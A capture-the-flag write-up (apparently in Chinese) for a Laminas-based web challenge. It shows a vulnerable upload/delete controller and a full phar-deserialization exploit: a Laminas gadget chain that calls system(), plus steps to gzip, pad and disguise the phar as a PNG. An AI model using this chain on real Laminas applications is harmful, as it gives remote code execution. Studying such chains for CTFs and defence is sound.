红明谷2022 web Fan website
源码泄露
www.zip,查看路由
在composer.json中查看版本号,是2.11,存在已知的链子
这个框架的路由一般在/module/Application/config/module.config.php
中
在本题目中,/module
目录下有两个文件夹,一个是Application
,一个是Album
查看/module/src/Controller/AlbumController.php
<?php
namespace Album\Controller;
use Album\Model\AlbumTable;
use Laminas\Mvc\Controller\AbstractActionController;
use Laminas\View\Model\ViewModel;
use Album\Form\AlbumForm;
use Album\Form\UploadForm;
use Album\Model\Album;
class AlbumController extends AbstractActionController
{
// Add this property:
private $table;
private $white_list;
public function __construct(AlbumTable $table){
$this->table = $table;
//白名单设置
$this->white_list = array('.jpg','.jpeg','.png');
}
//默认主页
public function indexAction()
{
return new ViewModel([
'albums' => $this->table->fetchAll(),
]);
}
//添加信息
public function addAction()
{
$form = new AlbumForm();
$form->get('submit')->setValue('Add');
$request = $this->getRequest();
if (! $request->isPost()) {
return ['form' => $form];
}
$album = new Album();
$form->setInputFilter($album->getInputFilter());
$form->setData($request->getPost());
if (! $form->isValid()) {
return ['form' => $form];
}
$album->exchangeArray($form->getData());
$this->table->saveAlbum($album);
return $this->redirect()->toRoute('album');
}
//修改信息
public function editAction()
{
$id = (int) $this->params()->fromRoute('id', 0);
if (0 === $id) {
return $this->redirect()->toRoute('album', ['action' => 'add']);
}
// Retrieve the album with the specified id. Doing so raises
// an exception if the album is not found, which should result
// in redirecting to the landing page.
try {
$album = $this->table->getAlbum($id);
} catch (\Exception $e) {
return $this->redirect()->toRoute('album', ['action' => 'index']);
}
$form = new AlbumForm();
$form->bind($album);
$form->get('submit')->setAttribute('value', 'Edit');
$request = $this->getRequest();
$viewData = ['id' => $id, 'form' => $form];
if (! $request->isPost()) {
return $viewData;
}
$form->setInputFilter($album->getInputFilter());
$form->setData($request->getPost());
if (! $form->isValid()) {
return $viewData;
}
$this->table->saveAlbum($album);
// Redirect to album list
return $this->redirect()->toRoute('album', ['action' => 'index']);
}
//删除信息
public function deleteAction()
{
$id = (int) $this->params()->fromRoute('id', 0);
if (!$id) {
return $this->redirect()->toRoute('album');
}
$request = $this->getRequest();
if ($request->isPost()) {
$del = $request->getPost('del', 'No');
if ($del == 'Yes') {
$id = (int) $request->getPost('id');
$this->table->deleteAlbum($id);
}
// Redirect to list of albums
return $this->redirect()->toRoute('album');
}
return [
'id' => $id,
'album' => $this->table->getAlbum($id),
];
}
public function imgdeleteAction()
{
$request = $this->getRequest();
if(isset($request->getPost()['imgpath'])){
$imgpath = $request->getPost()['imgpath'];
$base = substr($imgpath,-4,4);
if(in_array($base,$this->white_list)){ //白名单
//反序列化触发点
@unlink($imgpath);
}else{
echo 'Only Img File Can Be Deleted!';
}
}
}
//图片上传
public function imguploadAction()
{
$form = new UploadForm('upload-form');
$request = $this->getRequest();
if ($request->isPost()) {
// Make certain to merge the $_FILES info!
$post = array_merge_recursive(
$request->getPost()->toArray(),
$request->getFiles()->toArray()
);
$form->setData($post);
if ($form->isValid()) {
$data = $form->getData();
$base = substr($data["image-file"]["name"],-4,4);
if(in_array($base,$this->white_list)){ //白名单限制
$cont = file_get_contents($data["image-file"]["tmp_name"]);
//对上传的文件的内容进行限制
if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) {
die("Not This");
}
//图片有大小要求
if($data["image-file"]["size"]<3000){
die("The picture size must be more than 3kb");
}
//图片存放的路径
$img_path = realpath(getcwd()).'/public/img/'.md5($data["image-file"]["name"]).$base;
//将路径回显
echo $img_path;
$form->saveImg($data["image-file"]["tmp_name"],$img_path);
}else{
echo 'Only Img Can Be Uploaded!';
}
// Form is valid, save the form!
//return $this->redirect()->toRoute('upload-form/success');
}
}
return ['form' => $form];
}
}
不同的方法对应不同的路由,相应的路由对应相应的功能
进行phar反序列化,注意上传的文件有大小限制,需要在生成phar文件的时候塞入垃圾信息,让文件大小>3KB
phar反序列化
exp
<?php
namespace Laminas\View\Resolver{
class TemplateMapResolver{
protected $map = ["setBody"=>"system"];
}
}
namespace Laminas\View\Renderer{
class PhpRenderer{
private $__helpers;
function __construct(){
$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
}
}
}
namespace Laminas\Log\Writer{
abstract class AbstractWriter{}
class Mail extends AbstractWriter{
protected $eventsToMail = ["cat /flag"];
protected $subjectPrependText = null;
protected $mail;
function __construct(){
$this->mail = new \Laminas\View\Renderer\PhpRenderer();
}
}
}
namespace Laminas\Log{
class Logger{
protected $writers;
function __construct(){
$this->writers = [new \Laminas\Log\Writer\Mail()];
}
}
}
namespace{
$a = new \Laminas\Log\Logger();
//echo base64_encode(serialize($a));
@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
//设置头部
$phar->setStub('<?php __HALT_COMPILER(); ?>');
//将自定义的meta-data存入manifest
$phar->setMetadata($a);
$phar->addFromString("test.txt",file_get_contents("test.txt"));
//$phar->addFromString("test.txt","test");
//签名自动计算
$phar->stopBuffering();
}
gzip test.phar
然后修改文件后缀为png
上传成功后,回显上传的位置
/var/www/public/img/364be8860e8d72b4358b5e88099a935a.png
然后在delete路由里,触发phar反序列化,得flag